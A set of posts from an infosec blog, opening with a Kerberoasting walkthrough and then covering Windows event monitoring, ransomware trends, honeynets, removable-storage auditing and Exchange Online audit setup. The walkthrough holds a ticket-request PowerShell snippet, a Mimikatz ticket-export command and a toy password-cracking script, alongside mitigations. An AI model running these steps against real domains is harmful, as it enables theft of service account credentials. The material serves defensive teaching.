Security, et al

Randy's Blog on Infosec and Other Stuff

Extracting Service Account Passwords with Kerberoasting

Thu, 07 Sep 2017 13:32:38 GMT

Service Account Attack #2: Extracting Service Account Passwords

In our first post, we explored how an attacker can perform reconnaissance to discover service accounts within an Active Directory (AD) domain. Now that we know how to find service accounts, let’s look at how an attacker can compromise those accounts and use them to exploit their privileges. In this post, we will explore one such method for doing that: Kerberoasting. This method is especially scary because it requires no elevated privileges within the domain, is very easy to perform once you know how, and is virtually undetectable.

Kerberoasting: Overview

Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). If you remember, in the reconnaissance post we focused on discovering service accounts by scanning for user objects’ SPN values. Kerberoasting allows us to crack passwords for those accounts. By logging into an Active Directory domain as any authenticated user, we can request service tickets (TGS) for service accounts by specifying their SPN values. Active Directory returns a service ticket encrypted with the NTLM hash of the account associated with that SPN. We can then brute-force these service tickets offline until one cracks, with no risk of detection or account lockouts. Once cracked, we have the service account password in plain text.

Even if you don’t fully understand the inner-workings of Kerberos, the attack can be summarized as:

  1. Scan Active Directory for user accounts with SPN values set.
  2. Request service tickets from AD using those SPN values.
  3. Extract the service tickets from memory and save them to a file.
  4. Crack the tickets offline with a brute-force or dictionary attack until the passwords are recovered.

With those steps in mind, you can imagine how easy it may be to get access to a domain and begin cracking all service accounts within minutes. From there, it’s just a waiting game until you have compromised one or more service accounts.

For a better understanding of the types of access that can be garnered using Kerberoasting, look at the list of SPN values maintained by Sean Metcalf on adsecurity.org.

Kerberoasting: How it Works

Step 1 – Obtain a list of SPN values for user accounts

We focus on user accounts because they tend to have shorter, less secure passwords. Computer accounts have long, complex, random passwords that change frequently. There are many ways to get this information, including built-in tools such as setspn.exe and plain LDAP queries.
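As a sketch of what this discovery step looks like in practice, the LDAP filter below is the standard one for finding user accounts with SPNs set; the directory entries are mock data for illustration only, not real query results.

```python
# The standard LDAP filter for Kerberoastable user accounts.
SPN_FILTER = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"

def find_spn_accounts(entries):
    """Return accounts with at least one servicePrincipalName value --
    the same accounts the LDAP filter above would match."""
    return [e["sAMAccountName"] for e in entries if e.get("servicePrincipalName")]

# Mock directory entries standing in for a real LDAP search result.
mock_directory = [
    {"sAMAccountName": "svc-sql", "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"]},
    {"sAMAccountName": "jsmith",  "servicePrincipalName": []},
    {"sAMAccountName": "svc-web", "servicePrincipalName": ["HTTP/web01.corp.local"]},
]

print(find_spn_accounts(mock_directory))  # ['svc-sql', 'svc-web']
```

In a real engagement the filter string would be handed to an LDAP client bound to a domain controller; only the accounts that come back with SPN values matter for the next step.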

Step 2 – Request Service Tickets for service account SPNs

To do this, you simply execute a couple of lines of PowerShell, and a service ticket is returned and stored in memory on your system.

Requesting Kerberos service tickets (TGS) for Service Principal Names found by querying Active Directory user accounts as an authenticated user

These tickets are encrypted with the password of the service account associated with the SPN. We are almost ready to start cracking them.
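The couple of lines of PowerShell mentioned above aren’t shown in this excerpt; one widely documented approach (from Tim Medin’s original Kerberoasting research) uses .NET’s KerberosRequestorSecurityToken class. The SPN below is a placeholder — substitute one discovered in Step 1.

```powershell
# Request a TGS for a target SPN as any authenticated domain user.
# "MSSQLSvc/db01.corp.local:1433" is a placeholder SPN.
# The resulting ticket is cached in memory on your system.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `
    -ArgumentList "MSSQLSvc/db01.corp.local:1433"
```

This requires no special privileges — any domain user can request a service ticket for any SPN.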

Step 3 – Extract Service Tickets Using Mimikatz

Mimikatz allows you to extract local tickets and save them to disk. We need to do this so we can pass them into our password cracking script. To do this, you must install Mimikatz and issue a single command.

Extracting service tickets using Mimikatz to pass them into the password cracking script without using admin rights
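The single command referenced above is, in most write-ups of this technique, Mimikatz’s ticket-export command; run from the compromised user’s session (no admin rights are needed to export your own session’s tickets), it writes each cached ticket to a .kirbi file in the current directory:

```
mimikatz # kerberos::list /export
```

The exported .kirbi files are what get fed to the offline cracking script in the next step.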

Step 4 – Crack the Tickets

Now that you have the tickets saved to disk, you can begin cracking the passwords. Cracking service accounts is a particularly successful approach because their passwords very rarely change. Also, cracking the tickets offline will not cause any domain traffic or account lockouts, so it is undetectable.

The Kerberoasting toolkit provides a useful Python script to do this. It can take some configuration to make sure you have the required environment to run the script; there is a helpful blog here, which covers those details for you.

The script will run a dictionary of passwords as NTLM hashes against the service tickets you have extracted until it can successfully open the ticket. Once the ticket can be opened, you have cracked the service account and are provided with its clear-text password! 

Using the Python script from the Kerberoasting toolkit to crack service account tickets and extract the service account’s clear-text password
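The cracking loop can be sketched as follows. This is a toy model: MD5 stands in for the NTLM (MD4) hash and a simple XOR stream stands in for RC4 — real tickets use RC4-HMAC keyed with the service account’s NT hash, and real tools detect success by finding valid ASN.1 structure rather than a known prefix — but the shape of the dictionary attack is the same.

```python
import hashlib

def keystream(password, length):
    # Toy keystream derived from the password (stand-in for RC4 keyed
    # with the NT hash of the password).
    key, out = hashlib.md5(password.encode()).digest(), b""
    while len(out) < length:
        key = hashlib.md5(key).digest()
        out += key
    return out[:length]

def encrypt(password, data):
    # XOR stream cipher: encryption and decryption are the same operation.
    return bytes(a ^ b for a, b in zip(data, keystream(password, len(data))))

def crack(ticket, wordlist, known_prefix=b"TGS"):
    # Try each candidate password; success is recognizable structure in
    # the decrypted ticket (real tools check for valid ASN.1 instead).
    for candidate in wordlist:
        if encrypt(candidate, ticket).startswith(known_prefix):
            return candidate
    return None

# A captured "ticket" encrypted under the service account's password.
ticket = encrypt("Summer2017!", b"TGS:svc-sql@CORP.LOCAL")
print(crack(ticket, ["password", "letmein", "Summer2017!"]))  # Summer2017!
```

Because everything happens against the captured ticket on the attacker’s own machine, no failed attempts ever touch the domain — which is why lockout policies never fire.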

Protecting Yourself from Kerberoasting Attacks

The best mitigation for this attack is to ensure that service accounts that use Kerberos with SPN values have long, complex passwords. If possible, rotate those passwords regularly. Using Group Managed Service Accounts (gMSAs) will enforce random, complex passwords that can be automatically rotated and managed centrally within AD.

To detect the attack in progress, monitor for abnormal account usage. Service accounts traditionally should be used from the same systems in the same ways, so it is possible to detect authentication anomalies. Also, you can monitor for service ticket requests in Active Directory to look for spikes in those requests.

This is the second installment in our blog series, 4 Service Account Attacks and How to Protect Against Them. To read the other installments, please click Read Now below or watch the webinar here.

Service Account Attack #1 – Discovering Service Accounts without using Privileges Read Now
Service Account Attack #3 – Targeted Service Account Exploitation with Silver Tickets Read Now
Service Account Attack #4 – Exploiting the KRBTGT service account for Golden Tickets Read Now

Watch this video and sign up for the complete Active Directory Attacks Video Training Series here (CPE Credits offered).


Today's webinar includes first-hand account of a company brought to its knees by NotPetya

Wed, 26 Jul 2017 18:24:34 GMT

We have an added treat in today's real training for free ™ session.  Two of my guests on the webinar will describe their firsthand experience helping a company recover from NotPetya and the lessons learned so far.  All 15,000 employees were sent home except for the IT staff tasked with rebuilding their infrastructure from scratch.  That's just the beginning.

Title: Something Worse Than Ransomware: Architecting for a New Breed of Malware that Simply Destroys

Click here to register


Two new "How-To" Videos on Event Monitoring

Wed, 21 Jun 2017 14:02:26 GMT

I just released two new "How-To" videos on monitoring two important areas with Windows Event Collection.

Video 1 - In this 4-minute video, I show you step by step how you can use my latest product, Supercharger, to create a WEC subscription that pulls PowerShell security events from all of your endpoints to a central collector.

Video 2 - In this 8-minute video, you will learn how to monitor security event ID 4688 from all of your endpoints. Normally this would create a plethora of data, but using Supercharger's Common System Process noise filter you will see how you can leave 60% of the noise at the source.
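For readers curious what source-side filtering looks like under the hood, a WEC subscription query along these lines is typical; the suppressed process name below is a hypothetical illustration, not Supercharger's actual filter list:

```xml
<QueryList>
  <Query Id="0" Path="Security">
    <!-- Forward process-creation events... -->
    <Select Path="Security">*[System[(EventID=4688)]]</Select>
    <!-- ...but leave routine system-process noise at the source -->
    <Suppress Path="Security">
      *[EventData[Data[@Name='NewProcessName']='C:\Windows\System32\svchost.exe']]
    </Suppress>
  </Query>
</QueryList>
```

Because the Suppress clause is evaluated on each endpoint before forwarding, the noise never crosses the wire at all.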

You can watch the videos by clicking on the links above or by visiting the Supercharger resources page by clicking here.


Download Supercharger Free Edition for Easy Management of Windows Event Collection

Wed, 14 Jun 2017 08:59:58 GMT

We just released a new, free edition of Supercharger for Windows Event Collection, which you can get here.

There are no time-outs and no limits on the number of computers you can manage with Supercharger Free.

I wanted to include more than enough functionality so that anyone who uses WEC would want to install Supercharger Free right away.  For non-WEC users, Free Edition helps you get off the ground with step-by-step guidance. 

With Supercharger Free you can stop remoting into each collector and messing around with Event Viewer just to see the status of your subscriptions.  You can see all your collectors, subscriptions and source computers on a single pane of glass – even from your phone.  And you can create/edit/delete subscriptions as necessary.

I also wanted to help you get more from WEC’s ability to filter out noise events at the source by leveraging my research on the Windows Security Log. 

Supercharger Free Edition:

  • Provides a single pane of glass view of your entire Windows Event Collection (WEC) environment across all collectors and domains
  • Virtually eliminates the need to remote into collectors and wrestle with Event Viewer.  You can manage subscriptions right from the dashboard
  • Includes a growing list of my personally-built Security Log noise filters that help you get the events you need while leaving the noise behind

The manager takes only a few minutes to install and can even co-exist on a moderately loaded collector.  Then it’s just seconds to install the agent on your other collectors.  You can uninstall Supercharger without affecting your WEC environment. 

I hope Supercharger Free is something that saves you time and helps you accomplish more with WEC.

This is just the beginning.  We’ve got more exciting and free stuff coming.  But you’ll need at least Supercharger Free to make use of what’s next, so install it today if you can.

Thank you for supporting my site over the years.  Here’s something new and free to say thanks.


How to Monitor Active Directory Changes for Free: Using Splunk Free, Supercharger Free and My New Splunk App for LOGbinder

Fri, 02 Jun 2017 17:11:59 GMT

No matter how big or small you are, whether you have budget or not – you need to be monitoring changes in Active Directory.  There are awesome Active Directory audit solutions out there.  And ideally you are using one of them.  But if for whatever reason you can’t, you still have AD and it still needs to be monitored.  This solution helps you do just that.  

Yesterday during my webinar, How to Monitor Active Directory Changes for Free: Using Splunk Free, Supercharger Free and My New Splunk App, we released a version of our Splunk App for LOGbinder.  Not only is this application free, but with the help of our just-announced free edition of Supercharger for Windows Event Collection, we demonstrate the power of WEC’s XPath filtering to deliver just the relevant events to Splunk Free and stay within its 500MB daily indexing limit.  It’s a trifecta of free tools that produces this:

Among other abilities, our new Splunk App puts our deep knowledge of the Windows Security Log to work by analyzing events to provide an easy-to-use but powerful dashboard of changes in Active Directory.  You can see what’s been changing in AD sliced up:

by object type (users, groups, GPOs, etc)
by domain
by time
by administrator

Too many times I see dashboards that showcase the biggest and highest-frequency actors and subjects, but get real – most of the time what you are looking for is the needle, not the haystack.  So we show the smallest, least frequent actors and objects too.  

Just because it’s free doesn’t mean it’s low value.  We put some real work into this.  I always learn something new about our own little AD lab environment when I bring this app up.  To make this app work we had to make some improvements to how Splunk parses Windows Security Events.  The problem with stuff built by non-specialists is that it suffices for filling in a bullet point like “native parsing of Windows Security Logs” but doesn’t come through when you get serious about analysis.  Case in point: Splunk treats these 2 very different fields in the below event as one:

As you can see, rsmith created the new user cmartin.  But check out what Splunk does with that event:

Whoa! So there’s no difference between the actor and the target of a critical event like a new account being created?  One Splunker tells me they have dealt with this issue by ordinal position, but I'm frightened that actor and target could switch positions.  Anyway, it’s ugly.  Here’s what the same event looks like once you install our Splunk App:

That’s what I'm talking about! Hey, executives may say that’s just the weeds, but you and I know that with security the devil is in the details.  

Now, you knowledgeable Splunkers out there are probably wondering if we get these events by defining them at index time.  And the answer is “no”.  I provided the Windows Security Log brains but we got a real Splunker to build the app and you’ll be happy to know that Imre defined these new fields as search time fields.  So this works on old events already indexed and more importantly doesn’t impact indexing.  We tried to do this right.

Plus, we made sure this app works whether you consume events directly from the Security log of each computer or via Windows Event Collection (which is what we recommend with the help of Supercharger). 
To learn more about the overall solution please watch the webinar, which is available on demand at

For those of you new to Splunk, we’ll quickly show you how to install Splunk Free and our Splunk App.  Then we’ll show you how in 5 minutes our free edition of Supercharger for Windows Event Collection can have your domain controllers efficiently forwarding just the relative trickle of relevant change events to Splunk.  Then we’ll start rendering some beautiful dashboards and drilling down into those events.  I'll briefly show you how this same Splunk app can also analyze SharePoint, SQL Server and Exchange security activity produced by our LOGbinder product, mix all of that activity with AD changes, and plot it on a single pane of glass.

Or check out the solution page at where there are links to the step-by-step directions.

And if you are already proficient with Splunk and collecting domain controller logs you can get the Splunk app at and look under SIEM Integration.  

For technical support please use the appropriate forum at 


Ransomware Is Only Getting Started

Mon, 29 May 2017 16:20:01 GMT

Ransomware is about denying you access to your data via encryption. But that denial has to be of great enough magnitude to create sufficient motivation for the victim to pay. The magnitude of the denial is a function of:

  • Value of the encrypted copy of the data which is a function of
    • Intrinsic value of the data (irrespective of how many copies exist)
    • The number of copies of the data and their availability
  • Extent of operations interrupted

If the motivation to pay is about the value of the data, remember that the data doesn’t need to be private. It just needs to be valuable. The intrinsic value of the data (irrespective of copies) is only the first factor in determining the value of the criminally encrypted copy. The number of copies of the data and their level of availability exert upward or downward pressure on the value of the encrypted copy. If the victim has a copy of the data online and immediately accessible, the ransomware-encrypted copy has little to no value. On the other hand, if there are no backups of the data, the value of the encrypted copy skyrockets.

But ransomware criminals frequently succeed in getting paid even if the value of the encrypted copy of data is very low. And that’s because of the operations interruption. An organization may be hit by ransomware that doesn’t encrypt a single file containing data that is intrinsically valuable. For instance, the bytes in msword.exe or outlook.exe are not valuable. You can find those bytes on billions of PCs and download them at any time from the Internet.

But if a criminal encrypts those files you suddenly can’t work with documents or process emails. That user is out of business. Do that to all the users and the business is out of business.

Sure, you can just re-install Office, but how long will that take? And surely the criminal didn’t stop with those 2 programs.

Criminals are already figuring this out. In an ironic twist, criminals have co-opted a white-hat encryption program for malicious scrambling of entire volumes. Such system-level ransomware accomplishes complete denial of service for the entire system and all business operations that depend on it.

Do that to enough end-user PCs or some critical servers and you are into serious dollar losses no matter how well prepared the organization.

So we are certainly going to see more system-level ransomware.

But encrypting large amounts of data is a very noisy operation that you can detect if you are watching security logs and other file i/o patterns which just can’t be hidden.

So why bother with encrypting data in the first place? Here are 2 alternatives that criminals will increasingly turn to:

  • Storage device level ransomware
  • Threat of release

Storage device level ransomware

I use the broader term storage device because, of course, mechanical hard drives are on the way out. Also, although I still use the term ransomware, storage device level ransomware may or may not include encryption. The fact is that storage devices have various security features built into them that can be “turned”. As a non-encryption but effective example, take disk drive passwords. Some drives support optional passwords that must be entered at the keyboard before the operating system boots. Sure, the data isn’t encrypted and you could recover it, but at what cost in terms of interrupted operations?

But many drives, flash or magnetic, also support hardware-level encryption. Turning on either of these options will require some privilege or exploitation of low-integrity systems, but storage-level ransomware will be much quieter, almost silent, in comparison to the application- or driver-level encryption of present-day malware.

Threat of release

I’m surprised we haven’t heard of this more already. Forget about encrypting data or denying service to it. Instead exfiltrate a copy of any kind of information that would be damaging if it were released publicly or to another interested party. That’s a lot of information. Not just trade secrets. HR information. Consumer private data. Data about customers. The list goes on and on and on.

There’s already a burgeoning trade in information that can be sold – like credit card information. But why bother with data that is only valuable if you can sell it to someone else and/or overcome all the fraud detection and loss-limiting technology that credit card companies are constantly improving?

The data doesn’t need to be intrinsically valuable. It only needs to be toxic in the wrong hands.

Time will tell how successful this will be, but it will happen. The combination of high read/write I/O on the same files is what makes ransomware stand out right now. And unless you are doing transparent encryption at the driver level, you have to accomplish it in bulk as quickly as possible. But threat-of-release attacks won’t cause any file system output. Threat-of-release also doesn’t need to process bulk amounts of information as fast as possible. Criminals can take their time and let it dribble out of the victim’s network to their command-and-control systems. On the other hand, the volume of outbound bandwidth with threat of release is orders of magnitude higher than with encryption-based ransomware, where all the criminal needs to send is encryption keys.

As with all endpoint based attacks (all attacks for that matter?) time is of the essence. Time-to-detection will continue to determine the magnitude of losses for victims and profits for criminals.

This article by Randy Smith was originally published by EventTracker


Just released: Randy Franklin Smith whitepaper

Fri, 19 May 2017 11:42:23 GMT

Just released: “Top 10 Ways to Identify and Detect Privileged Users by Randy Franklin Smith” white paper.

Read it online here:


Work Smarter – Not Harder: Internal Honeynets Allow You to Detect Bad Guys Instead of Just Chasing False Positives

Tue, 07 Mar 2017 10:44:31 GMT

Log collection, SIEM and security monitoring are the journey, not the destination. Unfortunately, the destination is usually a false positive. This is because we’ve gotten very good at collecting logs and other information from production systems, filtering that data and presenting it on a dashboard. But we haven’t gotten that good at distinguishing events triggered by bad guys from those triggered by normal everyday activity.

A honeynet changes that completely.

At the risk of perpetuating a bad analogy, I’m going to refer to the signal-to-noise ratio often thrown around when you talk about security monitoring. If you like that noise/signal concept, then the difference is like putting an egg timer in the middle of Times Square at rush hour. Trying to hear it is like trying to pick out bad-guy activity in logs collected from production systems. Now put that egg timer in a quiet room.  That’s the sound of a bad guy hitting an internal honeynet.

Honeynets on your internal network are normally very quiet. The only legitimate stuff that’s going to hit them are things like vulnerability scanners, network mapping tools and… what else? What else on your network routinely goes out and touches IP addresses that it’s not specifically configured to communicate with?

So you either configure those few scanners to skip your honeynet IP ranges, or else you leverage them as positive confirmation that your honeynet is working and reporting when it’s touched. You just de-prioritize that expected traffic to an “honorable mention” pane on your dashboard.

On the other hand, (unless someone foolishly publishes it) the bad guy isn’t going to know of the existence of your honeynet or its coordinates. So as he routinely scans your network, he’s inevitably going to trip over your honeynet – if you’ve done it right. But let’s talk about some of these points.

First, how would a bad guy find out about your honeynet?

  • Once he gets control of IT admin user accounts and reads their email, has access to your network and security documentation, etc. But if you have good privileged access controls, this should happen fairly late stage. Honeynets are intended to catch intrusions at early to mid-stage.
  • By lurking on support forums and searching the Internet (e.g. Stackoverflow, honeynet vendor support sites). It goes without saying, don’t reveal your name, company or company email address in your postings.
  • By scanning your network. It’s pretty easy to identify honeynets when you come across them – especially low-interaction honeynets, which are most common. But guess what? Who cares? They’ve already set off the alarm. So this one doesn’t count.

So, honeynets are definitely a matter of security through obscurity. But you know what? We rely on security through obscurity a lot more than we think. Encryption keys are fundamentally security through obscurity. Just really, really, really, good obscurity. And security through obscurity is only a problem when you are relying on it as a preventive control – like using a “secret” port number instead of requiring an authenticated connection. Honeynets are detective controls.

But what if you are up against not just a persistent threat actor but a patient, professional and cautious one who assumes you have a honeynet and you’re listening to it. He’s going to tiptoe around much more carefully. If I were him I would only touch systems out there that I had reason to believe were legitimate production servers. Where would I collect such information? Places like DNS, browser history, netstat output, links on intranet pages and so on.

At this time, most attackers aren’t bothering to do that. It really slows them down, and they know it just isn’t necessary in most environments. But this is a constant arms race, so it’s good to think about the future. First, a bad guy who assumes you have a honeynet is a good thing because of what I just mentioned: it slows him down, giving more time for your other layers of defense to do their job.

But are there ways to optimize your honeynet implementation for catching the honeynet-conscious, patient attacker? One thing you can do is go to the extra effort and coordination with your network team to reserve more and smaller sub-ranges of IP addresses for your honeynet, so that it’s widely and granularly dispersed throughout your address space. This makes it harder to make a move without hitting your honeynet, and it further undermines the assumptions attackers usually find safe to make – such as that all your servers are in one range of static addresses, workstations are in another discrete range for DHCP, and another big block is devoted to your honeynet.

The bottom line, though, is that honeynets are awesome. You get very high detection with a comparatively small investment. Check out my recent webinar on honeynets sponsored by EventTracker, who now offers a Honeynet-as-a-Service that is fully integrated with your SIEM. Deploying a honeynet and keeping it running is one thing, but integrating it with your SIEM is another. EventTracker nails both.

This article by Randy Smith was originally published by EventTracker


Tracking removable storage with the Windows Security Log

Mon, 02 Jan 2017 10:46:36 GMT

With data breaches and Snowden-like information grabs I’m getting increased requests for how to track data moving to and from removable storage such as flash drives. The good news is that the Windows Security Log does offer a way to audit removable storage access. I’ll show you how it works and since the sponsor for this post, EventTracker, has some enhanced capabilities in this area I’ll briefly compare native auditing to EventTracker.

Removable storage auditing in Windows works similarly to File System auditing and logs the exact same events. The difference is in controlling what activity is audited.

To review: with File System auditing, there are two levels of audit policy. First you enable the Audit File System audit subcategory at the computer level. Then you choose which folders you wish to audit and enable object-level auditing on those folders for the users/groups, permissions and success/failure results that need to be monitored. For instance, you can audit Read access on C:\documents for the SalesReps group.

However, Removable Storage auditing is much simpler to enable and far less flexible. After enabling the Removable Storage audit subcategory (see below), Windows begins auditing all access requests for all removable storage. It’s equivalent to auditing Full Control for Everyone.

As you can see, auditing removable storage is an all-or-nothing proposition. Once enabled, Windows logs the same event ID 4663 as for File System auditing. For example, the event below shows that user rsmith wrote a file called checkoutrece.pdf to a removable storage device Windows arbitrarily named \Device\HarddiskVolume4, using the program Explorer (the Windows desktop).

How do we know this is a removable storage event and not just normal File System auditing? After all, it’s the same event ID as used for normal file system auditing. Notice the Task Category above, which says Removable Storage. The information under Subject tells you who performed the action. Object Name gives you the name of the file, its relative path on the removable storage device, and the arbitrary name Windows assigned the device the first time it was connected to this system. Process information indicates the program used to perform the access. To understand what type of access (e.g. Delete, Write, Read) was performed, look at the Accesses field, which lists the permissions actually used.

If you wish to track information being copied from your network to removable storage devices, you should enable Audit Removable Storage via group policy on all your endpoints. Then monitor for Event ID 4663 where Task Category is Removable Storage and Accesses is either WriteData or AppendData.
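The monitoring rule above can be sketched as a simple filter over parsed 4663 events; the event records below are mock data carrying just the fields the rule needs.

```python
# Mock parsed Security-log events; only the fields relevant to the rule.
events = [
    {"EventID": 4663, "TaskCategory": "Removable Storage",
     "Subject": "rsmith",
     "ObjectName": "\\Device\\HarddiskVolume4\\checkoutrece.pdf",
     "Accesses": ["WriteData"]},
    {"EventID": 4663, "TaskCategory": "File System",
     "Subject": "jdoe", "ObjectName": "C:\\documents\\q3.xlsx",
     "Accesses": ["ReadData"]},
    {"EventID": 4663, "TaskCategory": "Removable Storage",
     "Subject": "jdoe",
     "ObjectName": "\\Device\\HarddiskVolume4\\notes.txt",
     "Accesses": ["ReadData"]},
]

def removable_writes(events):
    """Flag 4663 events where data was written to removable storage:
    Task Category is Removable Storage and Accesses includes
    WriteData or AppendData."""
    return [e for e in events
            if e["EventID"] == 4663
            and e["TaskCategory"] == "Removable Storage"
            and {"WriteData", "AppendData"} & set(e["Accesses"])]

for e in removable_writes(events):
    print(e["Subject"], "wrote", e["ObjectName"])
```

Note that reads from removable storage pass through the filter untouched; only write and append access trips the alert, which keeps the rule focused on data leaving the network.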

As you can see, Microsoft took the most expedient route possible to providing an audit trail of removable storage access. There are no events for tracking the connection of devices – only file-level access events for the files on the device. These events also do not provide the ability to see the device model, manufacturer or serial number. That device information is known to Windows – it just isn’t logged by these events, since they are captured at the same point in the operating system where other file access events are logged. On the other hand, EventTracker’s agent logs both connection events and information about each device. In fact, EventTracker even allows you to selectively block or allow access to specific devices based on policy you specify. I encourage you to check out EventTracker’s enhanced abilities.

This article by Randy Smith was originally published by EventTracker


Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online

Tue, 27 Dec 2016 10:16:02 GMT

Email remains one of the most heavily used communications mediums within organizations today. With as much as 75 percent of your organization’s intellectual property stored in email[1], Microsoft Exchange is for all practical purposes a treasure trove of your organization’s most valuable secrets—just waiting for inappropriate access.

Regulatory bodies realize this, and therefore email and compliance go hand in hand. So IT needs to keep a watchful eye on exactly who is accessing what within Exchange Online. And that focus shouldn't be only on the people you trust, such as those who have been granted access to a given mailbox, but on any user. IT needs to help ensure visibility into the actions of potential threat actors who might have hijacked privileged accounts. The first thing external threat actors do after infiltrating your network is attempt to identify accounts that have elevated permissions. And those accounts can have access to the sensitive information stored within Exchange Online.

For years, Microsoft has enabled an audit trail within on-premises Exchange Server. The same capability exists for Exchange Online—with some improvements to boot—giving IT organizations visibility into actions performed by administrators and regular users alike. But be forewarned: You're largely on your own here. Microsoft has provided some functionality via administrative consoles, but the ability to successfully enable, configure, and audit Exchange Online events depends fairly heavily on PowerShell.

The challenge isn’t configuring the auditing of events; that part is simple. Rather, the challenge is finding the event or events that are pertinent to the auditing query in question. If you’ve spent any time in Event Viewer, you know how it feels to rummage through countless thousands of event entries, trying to find the one entry you’re looking for.

Microsoft has taken great strides to provide you the tools necessary to simplify the process of auditing. Still, a bit of work remains to enable, configure, and retrieve meaningful audit data.

This whitepaper explains those necessary steps and provides guidance for properly auditing changes to your Exchange Online environment within Office 365. The paper also covers ways to focus your auditing lens on the right what, who, and where so that you can quickly and accurately find answers to those sometimes difficult auditing questions. 

Auditing Experts – Quest


Understanding what’s going on within Exchange Online involves much more than the ability to centralize audit data. To truly audit such complex environments, you need a deeper understanding of each event and its detail, how audit events correlate, and what that information means to the organization—along with the ability to make the data understood.


Quest Change Auditor is the culmination of tens of thousands of hours of work dissecting every auditable event over a variety of platforms and applications. This effort turns raw, indecipherable information into intelligent detail, from which an IT organization can obtain actionable insight.


Look for auditing insights from Quest throughout this paper.

Connecting to Office 365 to Enable and Configure Auditing

The first step is to enable auditing. Auditing is disabled by default, as not every organization is required to — or even interested in — auditing what happens within Exchange Online. As previously mentioned, much of this step happens in PowerShell. You’ll need to connect to Exchange Online via PowerShell so that all commands are run against your instance of Exchange Online.

Open a PowerShell window. You don’t need to be a local admin to run Exchange commands against the cloud, but you do need appropriate permissions within Exchange Online; more on these permissions soon. To connect to Exchange Online, you’ll run four commands.

Set-ExecutionPolicy RemoteSigned

This command tells PowerShell that downloaded scripts signed by a trusted publisher (Microsoft, in this case) can run on the local computer.

$UserCredential = Get-Credential

This command displays a login dialog box that you use to store an Office 365 admin credential (which does not necessarily need to be the same credential you used to start the PowerShell window) as a parameter for use in the third command.

$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $UserCredential -Authentication Basic -AllowRedirection

This command establishes a new PowerShell session with Office 365, using the provided credentials and the specified URL. The command stores all this information in the $Session variable.

Import-PSSession $Session

This command imports commands (e.g., cmdlets, functions, aliases) from the remote computer (i.e., Office 365) into the current session. At this point, you’re properly connected to Exchange Online and can begin auditing your Exchange Online environment. 

Quest Insight – What Should You Be Auditing?

Exchange Online can be configured to generate a ton of information—which, of course, means more data for you to sift through. Because you are essentially in control of how much audit data is generated, you can determine which activities to include. You can focus on three categories of audit activity:


  • Message tracking is the actual flow of messages from one user to another. At a minimum, this category can be used to show who is emailing whom, such as whether email is being sent to a competitor. On a larger scale, message tracking can be used with analytics to see how the business uses email. This tracking is useful for seeing how internal messaging flows; for example, from one department to another. Message tracking can also be used to see the flow of traffic in and out of the organization; for example, which domains send or receive the most email. You can use the Get-MessageTrace cmdlet to retrieve a list of messages that meet query criteria such as sender or recipient address, date range, or source IP address. This activity is most appropriate when a review of specific sent and received messages is needed in addition to a review of mailbox contents. This tracking can also be useful when connected to a SIEM solution, using keyword alerts to identify inappropriate messages.

  • Admin operations involve any actions that are taken within Office 365, including actions by your IT team or Microsoft (which maintains the Exchange Online instance). Admin operations, such as assigning permissions to a mailbox or setting up forwarding rules, can play a key role during an audit; even IT can play a role in inappropriate behaviors.

  • Non-owner mailbox access occurs whenever someone other than the owner accesses a mailbox. This category is important when sensitive information has been inappropriately accessed or forwarded, and the focus is on identifying who is responsible.
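As a quick illustration of the message-tracking category (the sender address and seven-day window below are placeholders; run this in a session connected to Exchange Online as described earlier), a Get-MessageTrace query might look like:

```powershell
# Sketch: trace messages sent by one user over the past week.
$start = (Get-Date).AddDays(-7)
$end   = Get-Date

Get-MessageTrace -SenderAddress "jsmith@example.com" -StartDate $start -EndDate $end |
    Select-Object Received, SenderAddress, RecipientAddress, Subject, Status
```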


Because message tracking typically falls outside an IT security audit, this paper forgoes that topic and focuses on the other two audit areas, which directly affect your organization's ability to document access, changes, and actions that would be of interest during an audit.

Auditing Admin Operations

Auditors are big believers in the ability to watch the watchers. Questions around changes that IT has made are just as important as those that focus on users exercising access that IT has granted. For example, if an audit revolves around the CEO forwarding intellectual property to a competitor, a good auditor doesn’t just accept that the CEO forwarded the information. Rather, the auditor also asks who has been granted permissions to the CEO’s mailbox—and who in IT granted those permissions.

Both security and compliance initiatives are useless without auditing admin operations. Because there are no preventative controls for admins (who need the ability to do "everything" to get their job done), controls that detect and deter inappropriate behavior are necessary. By putting an audit trail in place, you create accountability. After all, knowing that they're being audited tends to encourage admins to keep their behavior in check.

When it comes to Exchange Online, a number of actions can indicate malicious activity. For example, exporting a mailbox doesn't require logging on to the mailbox; IT can simply export it and review the resulting PST locally, so the export never triggers non-owner mailbox auditing. Another example is granting permissions: IT could assign a cohort inappropriate permissions to another user's mailbox, and then remove those permissions after the improper access is completed. Unless you audit admin operations, these actions would go completely unnoticed.

You can see why admin operations need to be included as part of your auditing strategy. Everything an admin does within Exchange Online is ultimately a PowerShell command, so Exchange audits admin activity at the PowerShell level. Each time an audited cmdlet is run, the action is logged.

To check which auditing is enabled within your organization, you can use the Get-AdminAuditConfig command, shown in the following figure.

Place specific focus on the AdminAuditLogCmdlets, AdminAuditLogExcludedCmdlets, and AdminAuditLogParameters fields, which identify whether every admin operation is audited or a subset.

Quest Insight – Age Limits

By default, admin audit data is kept for 90 days (as indicated by the AdminAuditLogAgeLimit value in the previous figure). You might want to consider extending the retention time. Organizations that perform annual audits should consider extending this value to more than 365 days (one year).
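A sketch of extending that retention period (the one-year value is illustrative; the parameter takes a dd.hh:mm:ss TimeSpan):

```powershell
# Sketch: raise the admin audit log age limit to 365 days.
Set-AdminAuditLogConfig -AdminAuditLogAgeLimit 365.00:00:00

# Confirm the new setting
Get-AdminAuditLogConfig | Select-Object AdminAuditLogAgeLimit
```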

To enable auditing, you need to leverage the Set-AdminAuditLogConfig cmdlet:

Set-AdminAuditLogConfig -AdminAuditLogEnabled $true

Quest Insight – Enabling Just the Right Amount of Admin Auditing

Each organization has different auditing requirements, so auditing of admin actions isn’t always as simple as “just audit everything.” If you simply enable all admin auditing, you’ll see all the changes that Microsoft makes on the back end, which might be something you don’t care to filter through during an audit.


